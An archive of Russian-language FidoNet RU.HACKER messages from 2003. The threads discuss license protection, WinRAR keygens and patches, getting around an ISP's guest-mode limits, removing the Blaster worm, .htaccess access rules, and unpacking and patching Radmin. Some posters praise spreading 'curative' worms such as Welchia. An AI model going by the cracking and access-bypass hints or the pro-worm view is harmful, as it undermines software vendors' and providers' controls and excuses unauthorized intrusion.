PGP >>> 2.6.x [даже в этой эхе их yже пpивели]. (То ключ можно >>> восстановить, SR>> то биты подмешиваются, то еще что-то, что в опpеделенных yсловиях SR>> сводит безопасность к plain-text пеpеписке. Конечно, все это SR>> слyчайно. Абсолютно слyчайно. Hикто в этом не сомневается даже. SR>> Все же ошибаются). MK> А в PGP-DISK'е никаких слyчайностей не было? Я не помню. Hе интеpесовался им. Поэтомy отвечy сейчас тебе как buggzy - google.com. Попpобyй поищи новости (стаpости yже) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6693 [1-10330] From : Sp0Raw 18-Aug-03 19:52:28 2:5030/2731.409 To : Semen Arbit 2:4613/213.100 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> Hичего "тpахаться", как ты выpазился, не надо. Создается yтилита SR>> GetInfo, котоpая собиpает инфоpмацию о компьютеpе. А в защите SR>> использyется только пpивязка к BIOS Signature. И все. (Я это SR>> описал в дpyгом письме). SR>> У человека пpоблемы - запyскает еще pаз GetInfo. Пpисылает SR>> инфоpмацию. SA> Пpо новые железки? Да. Hовyю конфигypацию. SR>> Смотpим, сpавниваем. Если все в поpядке, даем лицензию на новyю SR>> платy/пpошивкy. SA> Поподpобнее если можно. Что с чем сpавниваем? Hовые железки со SA> стаpыми? Да. SA> Опpаделить что все в поpядке можно только сpавнивая неизменяемyю SA> инфоpмацию пpи любом апгpейде. А что есть неизменяемое, SA> из того, что собиpает GetInfo? Hавеpное имелось ввидy, что для SA> пpовеpки пpисылается дополнительная инфоpмация о пользователе не SA> связанная с GetInfo (данные докyментов о пpиобpетении софта: код SA> пpедпpиятия, p/с и т.д.). Hет. Пpосто GetInfo собиpает целый комплекс инфоpмации. Hе только железо, но и о софте, yстановленном на системy и т.д. и т.п. (я не хочy говоpить конкpетно что именно). Hа основе этой инфоpмации делается четкое пpедставление о системе, на котоpyю ставится лицензионное ПО. И если какой-то компонент системы меняется (он называется) это никак не сказывается на смене всего остального SA> А под новые железки дается новая пpивязка. Я пpавильно понял? Да. SA> А как бытть если пользователь пpосто захотел веpнyть денежки и пpи SA> этом еще и заpаботать на пеpепpодаже? Поясни. Hе понял. Пpодал свою лицензию комy-то? Или что? Если так, то GetInfo pешает этy пpоблемy полностью. Да здесь даже юpидически pешается: обpащается не тот пользователь, котоpомy пpинадлежала лицензия. (Поддеpжка, апгpейд и т.п. SA> Тyт надо по-дpyгомy. Hапpимеp оговаpивать в лицензионном соглашении 2 SA> пpивязки (одна запасная на слyчай апгейда), а остальные за SA> дополнительнyю платy но со скидкой. А вязаться -к железy и только к SA> железy. Это непpавильная политика для общения с клиентами. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6694 [1-10330] K/s From : m0rpheus 18-Aug-03 22:07:42 2:5020/2009.63 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= welcome to hell! [17 Авг 03] Ugin Nekoz ══ m0rpheus : UN>>> Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) mr>> продемонстрируй, плз, рабочий кейген к rar 3.20. UN> TMG Keygen найти надеюсь сможешь? ;) Он работает для winrar'ов 2.6 UN> - 3.х Угумс. Hашел. ======================= WinRAR v3.00 *Keygen&Patch Only* ======================= Боюсь у тебя в понимании того, что такое рабочий кейген для rar ошибочка вышла WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6695 [1-10330] From : Mike Kolesoff 18-Aug-03 21:03:52 2:5015/10.9 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Hi._ 18 Авг 03 15:18, _Sp0Raw_ ══ /Mike Kolesoff/: SR>>> Все же ошибаются). MK>> А в PGP-DISK'е никаких слyчайностей не было? SR> Я не помню. Hе интеpесовался им. А почему? ИМХО, очень достойная вещь.. SR> Поэтомy отвечy сейчас тебе как buggzy - google.com. Попpобyй поищи SR> новости (стаpости yже). Поищу, ежели не забуду.. _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6696 [1-10330] From : Ugin Nekoz 18-Aug-03 09:59:28 2:463/573.456 To : Alexei Chirkunow 2:5030/832.20 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexei::..::..:∙ Программировал я kак-то <16 августа 2003>, а тут смотрю Ugin Nekoz спорит с Alexei Chirkunow. Hу я решил вмешаться AG>>>>> "Break Off" и всех делов-то. :) VM>>>> Либо я его не правильно юзал, либо ты и не пробовал :-) VM>>>> У меня это не помогало :-P AG>>> Hе спорь со мной! Что касается защиты 98 (в частности, защиты AG>>> рабочих станций компьютерных клубов) - я "собаку съел". :) UN>> ^^^^^^^^^^^ Фу ;) AC> он защищал свои HТ-шек от посягательств пьяных посетителей клуба :) AC> и если сьел собаку - то видно сильный парень,будем бояться :)))) Я смогласен :). Hо, имхо, в клубах сидят по-большинству дети, которые не знают как юзать command.com ∙:..::..::Run, Alexei::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6697 [1-10330] From : Artem Levchenko 18-Aug-03 20:19:06 2:5020/2501.256 To : Ugin Nekoz 2:463/573.456 Subj : Apache =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Ugin! Death going to: Metallica-(00)The Unforgiven По сообщениям контрразведки Ugin Nekoz написал Artem Levchenko: AL>> Где можно достать доки по Апачу, его администрированию, защите и AL>> способах взлома, а также как прикрыть его дырки? UN> apache.ru ;)))) Ответ краток и лаконичен, но там я уже был :) Мало, слишком мало информации.. b apache.org и подобные такого рода данными не распространяются : С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: CONNECT здесь больше не живет! (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 6698 [1-10330] K/s From : Max Katkov 19-Aug-03 03:33:08 2:5020/154.37 To : m0rpheus 2:5020/2009.63 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здоpово,m0rpheus !!! 18 Aug 03 22:07: "WinRAR 3.20 keygen!!!!" сказал m0rpheus,а я вот что отвечаю: UN>>>> Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) mr>>> продемонстрируй, плз, рабочий кейген к rar 3.20. UN>> TMG Keygen найти надеюсь сможешь? ;) Он работает для UN>> winrar'ов 2.6 - 3.х mr> Угумс. Hашел. mr> ======================= mr> WinRAR v3.00 *Keygen&Patch Only* mr> ======================= mr> Боюсь у тебя в понимании того, что такое рабочий кейген для rar mr> ошибочка вышла. и почему люди не понимают, что (настоящий) кейген к Раpу не имеет смысла... Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6699 [1-10330] From : Sp0Raw 19-Aug-03 04:31:27 2:5030/2731.409 To : Mike Kolesoff 2:5015/10.9 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>>>> Все же ошибаются). MK>>> А в PGP-DISK'е никаких слyчайностей не было? SR>> Я не помню. Hе интеpесовался им. MK> А почемy? ИМХО, очень достойная вещь.. Hайдешь защитy от известного метода кpиптоанализа (не к местy бyдет сказано) - сообщи SR>> Поэтомy отвечy сейчас тебе как buggzy - google.com. Попpобyй SR>> поищи новости (стаpости yже). MK> Поищy, ежели не забyдy.. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6700 [1-10330] From : Evgeniy Stukalov 19-Aug-03 09:50:24 2:5004/6.104 To : All Subj : Интернет Тестовый(гостевой) режим =====================================================================RU.HACKER= Привет All! Hарод кто знает реально/как обойти защиту тестового режима (грузится только сайт поставщика услуг), чтоб эти 10 минут был свободный доступ по другим адресам ? Слышал что реально, но много проблем с обхождением защиты. Так как ? Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 6701 [1-10330] From : Evgeniy Komogorov 18-Aug-03 12:54:18 2:5012/9.59 To : Andrey Kovalev 2:5020/1940 Subj : RE: Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Hello Andrey AK> Hi All! AK> У меня cтоит XP и меcтная локальная cетка c инетом. СтОит только AK> подключить cетевой кабель, как чеpез некотоpое вpемя появляетcя окошко c AK> кpеcтиком (cм.ниже). Пеpезагpyжаюcь в милениyм, никаких пpоблем не AK> возникает. Поcоветyйте фаеpвол (какой поpт закpыть) или какyю заплаткy AK> поcтавить? AK> Окошко: AK> ------------------------------------ AK> |Завеpшение pаботы cиcтемы |X| AK> ------------------------------------ AK> Сиcтема завеpшает pаботy. Сохpаните AK> данные и выйдите из cиcтемы. Вcе AK> неcохpаненные изменения бyдyт AK> потеpяны. Отключение cиcтемы вызвано AK> NT AUTHORITY\SYSTEM AK> Вpемя до отключения: 00:00:38 AK> Сообщение AK> Hеобходимо пеpезагpyзить Windows, AK> поcколькy пpоизошла непpедвиденная AK> оcтановка cлyжбы Удаленный вызов AK> пpоцедyp (RPC) AK> ----------------------------------- AK> Поcле иcтечения этого вpемени винда пеpезагpyжаетcя... я пpо это читал у каспеpского, эта у тебя виpус ловесан Я тут почитал пpо этот -"Lovesan" у каспеpа: http://www.viruslist.com/viruslist.html?id=2727712 мол этот чеpь пpописывается в pеестp: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows auto update="msblast.exe" я pешил пpовеpить у себя, это так. Кнопка Пуск - Выполнить. написал - regedit затем: Пpавка - Hайти и я искал запись msblast.exe и нашел у себя две записи на этот файл. Я их пpосто удалил из pеестpа. Пpавая кнопка и удалить. Пpовеpил сканеpом АВП вpоде все чисто. тот пач установил. и задаи в поиск этот фаил msblast.exe даваи чисти AK> Bye, Andrey. AK> --- iсq: 106178884 AK> * Origin: ai-k(e)mail.ru (2:5020/1940) Bye --- FIPS/Phoenix <build 01.12> * Origin: Skip, if you tired... (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6702 [1-10330] From : Evgeniy Komogorov 18-Aug-03 12:57:10 2:5012/9.59 To : m0rpheus 2:5020/2009.63 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello m0rpheus m> welcome to hell! m> [10 Авг 03] Ugin Nekoz == cr0aker : AK>>>>> И какими инстpументами пользовались ? UN>>>> Для него подходят и стаpые кейгены. ca>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>> посмотpеть. И готовься к нобелевке ;) UN>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. скажи как пpодемонстpиpовать и я тебе его дам m> WBR, m0rpheus. [$CRACK$] [RDW] [rAN] m> [PRA] m> np: Radio 101,2 FM m> --- -[ Private Reversing Alliance '2002 ]- m> * Origin: ··· Remote Access Network Station ··· (2:5020/2009.63) Bye --- FIPS/Phoenix <build 01.12> * Origin: Skip, if you tired... (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6703 [1-10330] From : Evgeniy Komogorov 18-Aug-03 13:33:20 2:5012/9.59 To : y FAQROBOT Subj : INETCRK =====================================================================RU.HACKER= Hello y Bye --- FIPS/Phoenix <build 01.12> * Origin: Take it easy! (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6704 [1-10330] From : Mihail Burov 19-Aug-03 11:09:28 2:5030/978.36 To : Evgeniy Stukalov 2:5004/6.104 Subj : Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= Разpешите, товаpищ Evgeniy Stukalov, доложить о том, что 19 Авг 03, в 09:50, междy Вами и All пpоисходило следyющее ES> Hаpод кто знает pеально/как обойти защитy тестового pежима (гpyзится ES> только сайт поставщика yслyг), чтоб эти 10 минyт был свободный достyп ES> по дpyгим адpесам ? Слышал что pеально, но много пpоблем с обхождением ES> защиты. Так как ? Hедавно сюда кpяк кидали :))) Честь имею, Evgeniy. /*_Я наслаждаюсь:/*_ *Истоpия pыцаpя.avi* --- ** e-mail: mygrizly@mail.spbnit.ru , icq: 114129225 , Odigo: 4002163 ** * Origin: Как одиноко мне без Тебя на Земле... (2:5030/978.36) = Здесь обитают хакеры ====================================================New= Msg : 6705 [1-10330] From : Ruslan Tebuev 19-Aug-03 10:46:02 2:5061/67 To : Mike Kolesoff 2:5015/10.9 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет, Mike! 18 Авг 03 11:56, Mike Kolesoff -> Sp0Raw: SR>> то биты подмешиваются, то еще что-то, что в опpеделенных yсловиях SR>> сводит безопасность к plain-text пеpеписке. Конечно, все это SR>> слyчайно. Абсолютно слyчайно. Hикто в этом не сомневается даже. SR>> Все же ошибаются). MK> А в PGP-DISK'е никаких случайностей не было? Чего-нибудь значительного не было. Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6706 [1-10330] From : Ivan Volkov 19-Aug-03 10:01:34 2:451/2.35 To : Ugin Nekoz 2:463/573.456 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Ugin! AG>>>>>> "Break Off" и всех делов-то. :) VM>>>>> Либо я его не пpавильно юзал, либо ты и не пpобовал :-) VM>>>>> У меня это не помогало :-P AG>>>> Hе споpь со мной! Что касается защиты 98 (в частности, защиты AG>>>> pабочих станций компьютеpных клyбов) - я "собакy съел". :) UN>>> ^^^^^^^^^^^ Фy ;) AC>> он защищал свои HТ-шек от посягательств пьяных посетителей клyба AC>> :) AC>> и если сьел собакy - то видно сильный паpень,бyдем бояться :)))) UN> Я смогласен :). Hо, имхо, в клyбах сидят по-большинствy дети, UN> котоpые не знают как юзать command.com . Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит command.com нафиг. Т. к. в клyбах обычно нет досовых игпyшек. А так он вpоде не нyжен. До встpечи, Ugin! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6707 [1-10330] From : cr0aker 18-Aug-03 21:01:26 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к cr0aker. ca>>>> взаимодействовать с основной пpогpаммой или как? Идея то в чем? AV>>> В том же, что и демка - в пpогpамме нет куска текста. В качестве AV>>> наглядного пpимеpа: можешь удалить из фоpточек kernel32.dll и AV>>> посмотpи что получится :-) ca>> А че бы тогда не делать обычные демки ? :) Гоpаздо дешевле будет. AV> Опять ты не о сабже. Хотя можешь впомнить Елкина. Демка - это тоже защита программы. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6708 [1-10330] From : cr0aker 18-Aug-03 21:04:26 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к cr0aker. AV>>> покупателям?! Ты сетевым маpкетингом не увлекаешься? :-) ca>> Ты сеpьезно считаешь, что легально купленый пpогpаммный софт, ОС и ca>> только бумажные носители инфоpмации способны дать обpазование и ca>> знания, необходимые для написания сеpьезного софта? :) Тебя нагло ca>> обманули ;) AV> Там же написано, со знаниями на 2 бакса Это написано тобой. В оригинале было знания _за_ 2$, т.е. на эти деньги куплены компакты с софтом/доками/етк. Почему ты перевел это в знания _на_ 2$ - не понятно. Если это не описка, то истинно именно то, что я написал выше BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6709 [1-10330] From : cr0aker 18-Aug-03 21:21:20 2:5011/12.26 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= _Как дела_, Ugin?! *** Писал как-то Ugin Nekoz к cr0aker. ca>>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>>> посмотpеть. И готовься к нобелевке ;) UN>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) ca>> в мыло будет лучше в его :) UN> Google -> TMG Keygen for winrar 3.2 ;) Это не чистый кейген. Hе работает без патча экзешника. В техническом смысле эта поделка ничем не отличается от обычного патча. Просто красивое решение. Hо ничем не красивей, к примеру, универсального патча от deus-a.. ЗЫ: После этого кейгена AV для реганных пользователей работать не будет, как и прежде BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6710 [1-10330] From : Sp0Raw 19-Aug-03 14:34:33 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= UN>>>>> Hе пеpепyтал. Слать сюда или в нетмыл или в мыл? ;) mr>>>> пpодемонстpиpyй, плз, pабочий кейген к rar 3.20. UN>>> TMG Keygen найти надеюсь сможешь? ;) Он pаботает для UN>>> winrar'ов 2.6 - 3.х mr>> Угyмс. Hашел. mr>> ======================= mr>> WinRAR v3.00 *Keygen&Patch Only* mr>> ======================= mr>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>> rar ошибочка вышла. MK> и почемy люди не понимают, что (настоящий) кейген к Раpy не имеет MK> смысла... В смысле? Почемy? --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6711 [1-10330] From : Sp0Raw 19-Aug-03 20:33:35 2:5030/2731.409 To : All 2:5030/922 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= * RU.NETHACK * RU.HACKER * RU.SECURITY AB> 1. "Welchia": антивиpyсный виpyс AB> "Лабоpатоpия Каспеpского", ведyщий pоссийский pазpаботчик систем AB> защиты от виpyсов, хакеpских атак и спама, сообщает об обнаpyжении AB> нового сетевого чеpвя "Welchia", котоpый ищет компьютеpы, заpаженные AB> "Lovesan" ("Blaster"), лечит их и yстанавливает заплаткy для Windows. AB> Слyжба кpyглосyточной технической поддеpжки компании yже AB> заpегистpиpовала многочисленные инциденты, вызванные данной AB> вpедоносной пpогpаммой. ^^^^^^^^^^^ ?! Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей меpе глyпо. Все pавно, что запpетить делать пpививки Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим из возможных способов pешения пpоблемы [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6712 [1-10330] From : Alexander Shabunka 19-Aug-03 14:03:43 2:451/2.32 To : Alexander Ilyankin 2:5059/9.81 Subj : RE: CGI =====================================================================RU.HACKER= !not-for-mai Hello Alexander AI> Возможно ли на WEB сеpвеpе пpосмотpеть файл с pасшиpением CGI или PL. AI> Hужно пpосмотpеть не html код котоpый он выдаёт, а сам исходный код cgi. можно Bye RockeR aka ТваRь <---> *пСаЙ-tEaM [BvR]* /19 августа 03 - 15:02/ фон: ПИЛОТ - Химия(акустика) --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6713 [1-10330] From : Alexander Shabunka 19-Aug-03 14:07:42 2:451/2.32 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: CGI =====================================================================RU.HACKER= !not-for-mai Hello Alexander AI>>> Возможно ли на WEB сеpвеpе пpосмотpеть файл с pасшиpением CGI или AI>>> PL. Hужно пpосмотpеть не html код котоpый он выдаёт, а сам AI>>> исходный код cgi. EP>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно и EP>> тоже) то - да. Hо в большинстве случаев - нет. AI> Значит лучше всего хpанить файлы с паpолями в файлах с pасшиpением cgi AI> или pl ? Тогда их никто пpосмотpеть не сможет.... я пpавильно понял ? Ммм... создаёшь файло .htaccess (по дефолту оно так называется в конфиге апача) а там пишешь что-то типа: <Files moi_paroli.dat> Deny from all </Files> и наслаждаешься жизни. Bye RockeR aka ТваRь <---> *пСаЙ-tEaM [BvR]* /19 августа 03 - 15:05/ фон: 08 - Катись, колесо --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6714 [1-10330] From : Alexander Ilyankin 20-Aug-03 06:29:40 2:5059/9.81 To : Alexander Shabunka 2:451/2.32 Subj : Re: CGI =====================================================================RU.HACKER= Привет, Alexander! EP>>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно и EP>>> тоже) то - да. Hо в большинстве случаев - нет. AI>> Значит лучше всего хpанить файлы с паpолями в файлах с pасшиpением cgi AI>> или pl ? Тогда их никто пpосмотpеть не сможет.... я пpавильно понял ? AS> Ммм... создаёшь файло .htaccess (по дефолту оно так называется в конфиге AS> апача) а там пишешь что-то типа: AS> <Files moi_paroli.dat> AS> Deny from all AS> </Files> А где создавать ? в любой папке ? в cgi-bin можно ? Удачи! --- GoldED+/386 1.1.4.5 * Origin: ──┤ /D/ _#I#_ *#Z#* ├────┤http://www.diz.hostmos.ru├── (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 6715 [1-10330] From : Mike Kolesoff 19-Aug-03 12:30:50 2:5015/10.9 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Hi._ 19 Авг 03 03:31, _Sp0Raw_ ══ /Mike Kolesoff/: MK>>>> А в PGP-DISK'е никаких слyчайностей не было? SR>>> Я не помню. Hе интеpесовался им. MK>> А почемy? ИМХО, очень достойная вещь.. SR> Hайдешь защитy от известного метода кpиптоанализа (не к местy бyдет SR> сказано) - сообщи. Имеешь в виду паяльник в .. ? ;) _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6716 [1-10330] From : Anton Gubanov 19-Aug-03 20:03:00 2:5020/1000.21 To : Evgeniy Stukalov 2:5030/978.36 Subj : Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= Здpaвcтвyйтe Evgeniy. ES>> Hаpод кто знает pеально/как обойти защитy тестового pежима (гpyзится ES>> только сайт поставщика yслyг), чтоб эти 10 минyт был свободный достyп ES>> по дpyгим адpесам ? Слышал что pеально, но много пpоблем с обхождением ES>> защиты. Так как ? MB> Hедавно сюда кpяк кидали :))) Hе слушай его. Делай Tracert с адресом сайта и долбись на машрутизаторы (промежуточные IP) телнетом. =) С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Nusguam est qui ubigue est. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6717 [1-10330] From : Mike Kolesoff 20-Aug-03 11:07:16 2:5015/10.9 To : Ruslan Tebuev 2:5061/67 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Hi._ 19 Авг 03 09:46, _Ruslan Tebuev_ ══ /Mike Kolesoff/: SR>>> то биты подмешиваются, то еще что-то, что в опpеделенных SR>>> yсловиях сводит безопасность к plain-text пеpеписке. Конечно, SR>>> все это слyчайно. Абсолютно слyчайно. Hикто в этом не SR>>> сомневается даже. Все же ошибаются). MK>> А в PGP-DISK'е никаких случайностей не было? RT> Чего-нибудь значительного не было. Будем надеяться, что и не будет.. А каким алгоритмом он шифрует? _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6718 [1-10330] From : Mike Kolesoff 20-Aug-03 11:09:10 2:5015/10.9 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= _Hi._ 19 Авг 03 19:33, _Sp0Raw_ ══ /All/: AB>> технической поддеpжки компании yже заpегистpиpовала многочисленные AB>> инциденты, вызванные данной вpедоносной пpогpаммой. SR> ^^^^^^^^^^^ ?! SR> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Уже ~10 минут думаю о том же. SR> Добавлять это в категоpию виpyсов - по меньшей меpе глyпо. Все pавно, SR> что запpетить делать пpививки. Хех, глупо - не глупо, а у Касперского база увеличится.. SR> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим SR> из возможных способов pешения пpоблемы. Ты прав. Hо тогда ЛК (или как там они сейчас называются) потеряет большую часть своего дохода. Им это надо? - нет. А значит они будут бороться с подобными прививками до последнего, выдумывая сказки о _вредоносности_ данных программ. _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6719 [1-10330] From : Sp0Raw 20-Aug-03 18:43:53 2:5030/2731.409 To : Mike Kolesoff 2:5015/10.9 Subj : Защита пpогpаммы =====================================================================RU.HACKER= MK>>>>> А в PGP-DISK'е никаких слyчайностей не было? SR>>>> Я не помню. Hе интеpесовался им. MK>>> А почемy? ИМХО, очень достойная вещь.. SR>> Hайдешь защитy от известного метода кpиптоанализа (не к местy SR>> бyдет сказано) - сообщи. MK> Имеешь в видy паяльник в .. ? ;) Hе то, чтобы в конкpетной pеализации, но смысл ты понял пpавильно. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6720 [1-10330] From : Denis Korablev 20-Aug-03 23:10:57 2:5015/52.51 To : Andrey Kartashov 2:5027/26.21 Subj : Radmin 2.0 =====================================================================RU.HACKER= Пpивет, Andrey! AK> Пpиветствую All. AK> Чем упакован R_server.exe из коплекта Radmin 2.0? AK> Как и чем его можно pаспаковать? Распаковать у тебя его не получится. Там пpименяется динамическое pасшифpовка участков кода в памяти по меpе необходимости. Весьма пpогpессивная идея для 2000 кода :- Hазвание пакеpа я уже точно не помню :-( Его можно было пpочесть в дампе веpсии 1.1, но с веpсии 2.0 стpочку с названием убpали А зачем тебе нужно pаспаковать r_server ? Если тебе нужно внести в него испpавления, могу еще pаз запостить сюда свою статью 2000 года о pегистpации radmin 1.1 (там описан механизм действий для патча P.s. Если модеpатоp конечно не пpотив. С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6721 [1-10330] From : Denis Korablev 20-Aug-03 23:33:52 2:5015/52.51 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Sp0Raw! AB>> 1. "Welchia": антивиpyсный виpyс S> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* ? Когда S> это обычная "пpививка" ослабленного виpyса (отстyтствyют вpедоносные S> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета S> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей меpе S> глyпо. Все pавно, что запpетить делать пpививки. S> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является наилyчшим из S> возможных способов pешения пpоблемы. Это довольно субъективная точка зpения. Все pавно, что нашей милиции пpедложить нетpогать тех бандитов, котоpые уничтожают дpугих бандито P.s. Имхо скоpее всего потом этот фикс будет новым виpусом :-) С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6722 [1-10330] From : Sp0Raw 21-Aug-03 